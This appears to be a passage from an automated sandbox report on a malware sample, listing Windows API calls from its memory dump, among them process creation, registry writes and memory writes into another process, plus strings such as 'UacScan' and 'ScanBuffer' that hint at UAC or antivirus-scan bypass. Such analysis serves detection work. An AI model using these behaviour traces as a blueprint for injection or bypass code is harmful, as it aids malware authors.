• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02EDE5F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 906aa40268b23a1bb030eb51880d5f5c2093b2fa104f1d16995c78915effc4c1
• Instruction ID: 390886a7ab1b34ab53811d0cd6059730358c0ce6f1432785043f55d94bba2e47
• Opcode Fuzzy Hash: 906aa40268b23a1bb030eb51880d5f5c2093b2fa104f1d16995c78915effc4c1
• Instruction Fuzzy Hash: 59410135B801099BEB01FBE4D951ADE73FAEF88700F64E429F051AB285DA70AD138F55
APIs
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02ED8814
Strings
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$CreateProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• API String ID: 3130163322-2353454454
• Opcode ID: 554f346403f0bc62e210fca64eee83c20e5c3c7efce1334ddc6d212f4d0e4137
• Instruction ID: b4cbf7a682873980f5682bfabbe91330cc98788cdfcfb97d874856f2c4502306
• Opcode Fuzzy Hash: 554f346403f0bc62e210fca64eee83c20e5c3c7efce1334ddc6d212f4d0e4137
• Instruction Fuzzy Hash: 6511E5B6680248BFEB40EFA9DD51F9AB7EDEB4CB44F519414BA08D3240C674ED128B24
APIs
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
• WinExec.KERNEL32(?,?), ref: 02ED8624
Strings
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
• Opcode ID: 8fcca304996f19ee3a68b6a545db39604470f1ef72aa93d6df1449059702b3b1
• Instruction ID: dcaf720c8cad3080a450a9bf52258ea93a9fa5f906be8be8fd1df62fb09fb68b
• Opcode Fuzzy Hash: 8fcca304996f19ee3a68b6a545db39604470f1ef72aa93d6df1449059702b3b1
• Instruction Fuzzy Hash: EA016D796C4208BFE700EBE4DC12F6AB7EDE748B10F60E460B900D2640D670AD128A24
APIs
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
• WinExec.KERNEL32(?,?), ref: 02ED8624
Strings
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
• Opcode ID: 694569c941b3f5f36d5bee27eac3a7f786170a81199bba7406516288e1140d88
• Instruction ID: 1df5f327f922a402a8d97e96055f0837b79d29ebc1cc4d495afef968468f3f62
• Opcode Fuzzy Hash: 694569c941b3f5f36d5bee27eac3a7f786170a81199bba7406516288e1140d88
• Instruction Fuzzy Hash: 7BF06D796C4208BFE700EBE4DC12F6AB7EDE748B10F60E460B900D2640D670AD128A24
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02ED5D74,?,?,02ED3900,00000001), ref: 02ED5C88
                                                                                                                • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02ED5D74,?,?,02ED3900,00000001), ref: 02ED5CB6
                                                                                                                  • Part of subcall function 02EC7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02ED3900,02ED5CF6,00000000,02ED5D74,?,?,02ED3900), ref: 02EC7DAA
                                                                                                                  • Part of subcall function 02EC7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02ED3900,02ED5D11,00000000,02ED5D74,?,?,02ED3900,00000001), ref: 02EC7FB7
                                                                                                                • GetLastError.KERNEL32(00000000,02ED5D74,?,?,02ED3900,00000001), ref: 02ED5D1B
                                                                                                                  • Part of subcall function 02ECA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02ECC3D9,00000000,02ECC433), ref: 02ECA797
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
Similarity
• API ID: CreateErrorFileLast$FormatFullMessageNamePath
• String ID:
• API String ID: 503785936-0
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,0303BA58), ref: 02EDF258
• RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02EDF2C3), ref: 02EDF290
• RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02EDF2C3), ref: 02EDF29B
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,0303BA58), ref: 02EDF258
• RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02EDF2C3), ref: 02EDF290
• RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02EDF2C3), ref: 02EDF29B
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• SysFreeString.OLEAUT32(02EDF4A4), ref: 02EC4C6E
• SysAllocStringLen.OLEAUT32(?,?), ref: 02EC4D5B
• SysFreeString.OLEAUT32(00000000), ref: 02EC4D6D
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
APIs
• SysFreeString.OLEAUT32(?), ref: 02ED73DA
Strings
Similarity
• API ID: FreeString
• String ID: H
• API String ID: 3341692771-2852464175
APIs
• VariantCopy.OLEAUT32(00000000,00000000), ref: 02ECE781
  • Part of subcall function 02ECE364: VariantClear.OLEAUT32(?), ref: 02ECE373
Similarity
• API ID: Variant$ClearCopy
• String ID:
• API String ID: 274517740-0
APIs
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
APIs
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
  • Part of subcall function 02ED7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
  • Part of subcall function 02ED8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02ED83C2), ref: 02ED83A4
• FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
Similarity
• API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
• String ID:
• API String ID: 1478290883-0
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32(00000000,?,00000000,02ED6DB9,?,?,?,00000000), ref: 02ED6D99
                                                                                                                  • Part of subcall function 02EC4C60: SysFreeString.OLEAUT32(02EDF4A4), ref: 02EC4C6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgString
                                                                                                                • String ID:
                                                                                                                • API String ID: 4225568880-0
                                                                                                                • Opcode ID: cb3aa1242804cba07520796cbbeffe643b6ab1757e9ef67ace87339588df8d4b
                                                                                                                • Instruction ID: 8e77e0bc0e81a356b2570136944f9e0d4c16e12a5bdefa419c827e38dc55ef09
                                                                                                                • Opcode Fuzzy Hash: cb3aa1242804cba07520796cbbeffe643b6ab1757e9ef67ace87339588df8d4b
                                                                                                                • Instruction Fuzzy Hash: 32E0E5352802087BE311FBA6FD51D8E7BBDDB8B700B6194B5F40093550DA316D018860
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(02EC0000,?,00000105), ref: 02EC5886
                                                                                                                  • Part of subcall function 02EC5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5AE8
                                                                                                                  • Part of subcall function 02EC5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5B06
                                                                                                                  • Part of subcall function 02EC5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5B24
                                                                                                                  • Part of subcall function 02EC5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02EC5B42
                                                                                                                  • Part of subcall function 02EC5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02EC5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02EC5B8B
                                                                                                                  • Part of subcall function 02EC5ACC: RegQueryValueExA.ADVAPI32(?,02EC5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02EC5BD1,?,80000001), ref: 02EC5BA9
                                                                                                                  • Part of subcall function 02EC5ACC: RegCloseKey.ADVAPI32(?,02EC5BD8,00000000,?,?,00000000,02EC5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02EC5BCB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 2796650324-0
                                                                                                                • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                • Instruction ID: 6ee1cfe08db304bd08d3ec7082df935fba80da13f779b6893e0e1ee9dff05dee
                                                                                                                • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                • Instruction Fuzzy Hash: 02E06D72A403149FCB10DE9CC9C0B8633D8AB08754F549965ED58DF346D7B1E9208BE0
                                                                                                                APIs
                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02EC7DF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3934441357-0
                                                                                                                • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                • Instruction ID: 94e53059ba7f0012cd2ed43e635ede58c73b2ebe715994a268202562fd3e1c17
                                                                                                                • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                • Instruction Fuzzy Hash: 75D05BB23491507BE224965A5D44EA75BDCCFC6770F10463DF568C7180D7208C01C671
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02EE356F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,Initialize), ref: 02EC7E8B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                • Instruction ID: aec7f552f372910844f55f654ed8bf7c896589320776d703abd5a180a0687164
                                                                                                                • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                • Instruction Fuzzy Hash: 76C08CF32912010E1E60A6FC1EC42AA42CD098413D770BE2DF838CA2C1D3169C232C20
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02EE041F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,UacInitialize), ref: 02EC7E67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                • Instruction ID: bb6c4671b717a5c8369240fa3169219e3342650afd3cde14368d2ad1259db438
                                                                                                                • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                • Instruction Fuzzy Hash: F0C08CF22812000E5A54A6FC2EC425A52CE094423C374BA2DF838C62E2D32298A32C10
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString
                                                                                                                • String ID:
                                                                                                                • API String ID: 3341692771-0
                                                                                                                • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                • Instruction ID: c40681f869b767538026166e669d6a225f85b56f125839d19be4fc58278e6186
                                                                                                                • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                • Instruction Fuzzy Hash: C5C012A668023057FB2156D9EEC0B9662DC9B05298B2450A5A408DB2A5E360D80156A0
                                                                                                                APIs
                                                                                                                • timeSetEvent.WINMM(00002710,00000000,02EEC350,00000000,00000001), ref: 02EEC36C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Eventtime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2982266575-0
                                                                                                                • Opcode ID: 49c1c3190b9151b0727bb2a38b319954a91a0b9d8cf41803ac23844e161a22dc
                                                                                                                • Instruction ID: 3c76962fdabdcbc67d51f638ec7214cd1688da2f8b24b2cd5185835dddaecb3b
                                                                                                                • Opcode Fuzzy Hash: 49c1c3190b9151b0727bb2a38b319954a91a0b9d8cf41803ac23844e161a22dc
                                                                                                                • Instruction Fuzzy Hash: 6AC048B1391B002AFA10A6A55C82F322A9DD306B11F20A056B609AA2C5D2A658408E68
                                                                                                                APIs
                                                                                                                • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02EC4C3F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2525500382-0
                                                                                                                • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                • Instruction ID: 63b899d10dd593a41244a141714c9bd06b4310249d5939ce1fc0ce38e3a2ea8e
                                                                                                                • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                • Instruction Fuzzy Hash: 46B092292C820515FA1822E24F10BF2044C0B5128AFA4B059AF19C80E5FA00C0039836
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02EC4C57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString
                                                                                                                • String ID:
                                                                                                                • API String ID: 3341692771-0
                                                                                                                • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                • Instruction ID: 4095003eb393fdb8a0df9870ffbaf6d6517a14e533b38d52df3a2865f2dba342
                                                                                                                • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                • Instruction Fuzzy Hash: 8EA0129C040202055A0A2298422041E11222EC02443A4D09C1104090554A2580027820
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02EC1A03,?,02EC1FC1), ref: 02EC15E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
